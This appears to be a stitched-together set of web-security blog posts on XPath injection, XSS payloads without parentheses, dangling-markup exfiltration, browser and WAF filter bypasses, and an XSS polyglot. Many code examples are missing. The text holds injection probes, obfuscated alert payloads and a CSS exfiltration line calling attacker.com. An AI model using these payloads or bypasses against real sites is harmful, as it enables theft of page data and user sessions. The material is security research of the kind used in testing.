The way most web apps defend themselves against DOM-based Cross-Site Scripting is by validating input that later on is written into the DOM. Sometimes, web apps request data from APIs that is trusted because it didn't come from the user, so it isn't validated. This post will show a trick for tampering with data provided by APIs that didn't come from the user by using XPath injection. Since the data is not validated you can achieve DOM-based XSS.
This attack can be useful because implementations of XPath 1.0 have a very limited attack surface. Only with XPath 2.0 and XPath 3.1 more critical attacks become a possibility. Implementations of XPath 2.0 and 3.1 are not very popular so most web apps out there use version 1.0.
Since a lot of people don't know XPath very well, I'll provide the basics to demonstrate how XPath works in order to know how to exploit it.
The first step to scan a web app against XPath injections is by using boolean based conditions such as the followings:
/vulnerable_page?id=1' and '1'='1 /vulnerable_page?id=1' and '1'='0
/vulnerable_page?id=1" and "1"="1 /vulnerable_page?id=1' and "1"="0
/vulnerable_page?id=1 and 1=1 /vulnerable_page?id=1 and 1=0
Restricting the use of parentheses is one of the toughest limitations I have come across, mainly due to the fact that sometimes all sorts of escapes and encodings are blocked.
Portswigger researcher Gareth Heyes (@garethheyes) even dedicated an entire chapter of his latest book "JavaScript for hackers" to illustrate different methods of running javascript that does not use parentheses. However, this post is not going to go over Gareth's techniques.
The easiest way to avoid parenthesis is by using grave accents:
alert``
However, these are also blocked very often.
Another thing you can do is to find a way to evaluate a string so that the parentheses can be escaped and/or encoded. Some functions that do this are:
However, the invocation of such functions needs parentheses as well.
The solution is to use javascript: protocol URLs, these can be assigned to window.location or document.location just like any other variable assignment.
The double-slash (//) after the javascript: protocol is a single-line comment that comments-out the whole URL until it reaches the new-line %0A after the #, the %0A gets decoded into a new-line breaking out of the single-line comment, then the payload follows and is executed. If the cross-site scripting is server-side the payload doesn't reach the server.
Some time ago, whenever script execution was being blocked by the Content-Security-Policy, an easy way to find a way around it was to perform dangling markup injection attacks. Dangling markup injections are scriptless attacks, an alternative to XSS for exfiltrating information from a web page.
Nowadays, some web browsers such as Google Chrome and Microsoft Edge have built-in security defenses that attempt to block these types of attacks. This blog post will expose three bypasses for these security defenses.
Dangling markup injection attacks are very simple. Imagine a web page that has an HTML injection vulnerability like the following example:
An HTML tag with an unclosed attribute is injected into the page. The unclosed attribute consumes the web page's content until it finds a matching closing quote.
When the request is made the URL will leak the document's content.
In this example a <link> tag was used to request a stylesheet from a foreign server which is logging incoming requests and waiting for the leaked data to arrive. But any HTML tag that performs an HTTP request will do, such as <img> or <iframe>. And really HTML is not the only option, CSS code could be used too in a scenario where style injection is feasible. CSS functionality such as background-image: url('http://attacker.com/?log= or @import could be used to force the browser to initiate an HTTP request.
Actually there's a github site named HTTPLeaks that lists all possible ways in which a browser can leak data through HTTP requests.
However things have changed through time and now most browsers implement defenses in an attempt to stop these types of attack; whenever an URL is rendered, the parser looks for certain dangerous patterns such as angle brackets < > and new lines (%0A %0D). If this combination of characters is found, then the request is blocked by the browser because it seems as if the document is being leaked through the URL. It is possible to see the blocked request in the dev-tools network panel:
I tested different dangling injections in different browsers. Chrome, Chromium, Edge and Opera are indeed blocking the exfiltrating request. However for some reason Firefox (v. 124) is not implementing such defense.
Since the dangling injections only work in Firefox, my goal was to find a way to make them work in other browsers too. I found a commit diff in Chromium's source code that illustrates the defense mechanism. Then, after looking some more, I found a security vulnerability report from 2017 that exposes a bypass for the request blocker. I was very lucky because I tested the attack vector in the other browsers and it successfully leaked the data.
I also found 2 more bypasses that work in all major browsers as well:
EDIT: Most of these bypasses have already been patched. Whereas some of the tricks shown in this post can be used to find new bypasses, this will only work on very few WAFs and it will other types of techniques should be use to bypass most of them.
In Black Hat 2009 I had the honor of personally meeting @sirdarckcat (Eduardo Vela, leader of Google Project Zero) who gave a presentation titled "Our favorite XSS filters and how to attack them". In his presentation he managed to bypass every single popular Web Application Firewall that was in the market at that time and he said it had been a piece of cake.
The conclusion of his talk was that all Web Application Firewalls (WAFs) were practically useless at that time due to the tremendous ease in which they could be bypassed.
Now, more than ten years later, I decided to evaluate the security of many popular WAFs to see their evolution and how robust they've become over time. The conclusion is that most of them are still extremely vulnerable. They are very easy to bypass so the degree of protection they offer is very low; I broke each WAF in around 5 minutes.
I decided to publish the bypasses because it is actually funny how bad these filters are.
Several years ago I found a nice feature in javascript that allows the attacker to break character sequences in a very easy, quick and shorter way. This is done by escaping characters that do not have an escape sequence assigned. For instance, these are valid escapes in javascript:
Those characters will be escaped to their corresponding values if you add a backslash before them.
If you use a backslash before any other character javascript will simply ignore the backslashes, so the string will be broken while still preserving its meaning:
window['\a\l\ert'](1) window['\pr\o\m\pt'](1)
Hopefully this will help to speed-up the process of evading WAFs.
It is 103 bytes long and it works in one more context than Gareth's (his doesn't work in single line comment contexts (//), although I find his vector to be more elegant).
I decided to improve it so that it works in every possible context:
You can also add a ${{7*7}} at the very end to test against template injections as well.
Besides for Blind XSS, this vector is also good for optimizing the process of finding regular cross-site scripting vulnerabilities. Instead of having to send 21 requests to each parameter when testing an application, you only have to make 1 request. This gets the job done in approximately only 5% of the time.
Can you make it even shorter? Let me know in the comments or through X (@ruben_v_pina)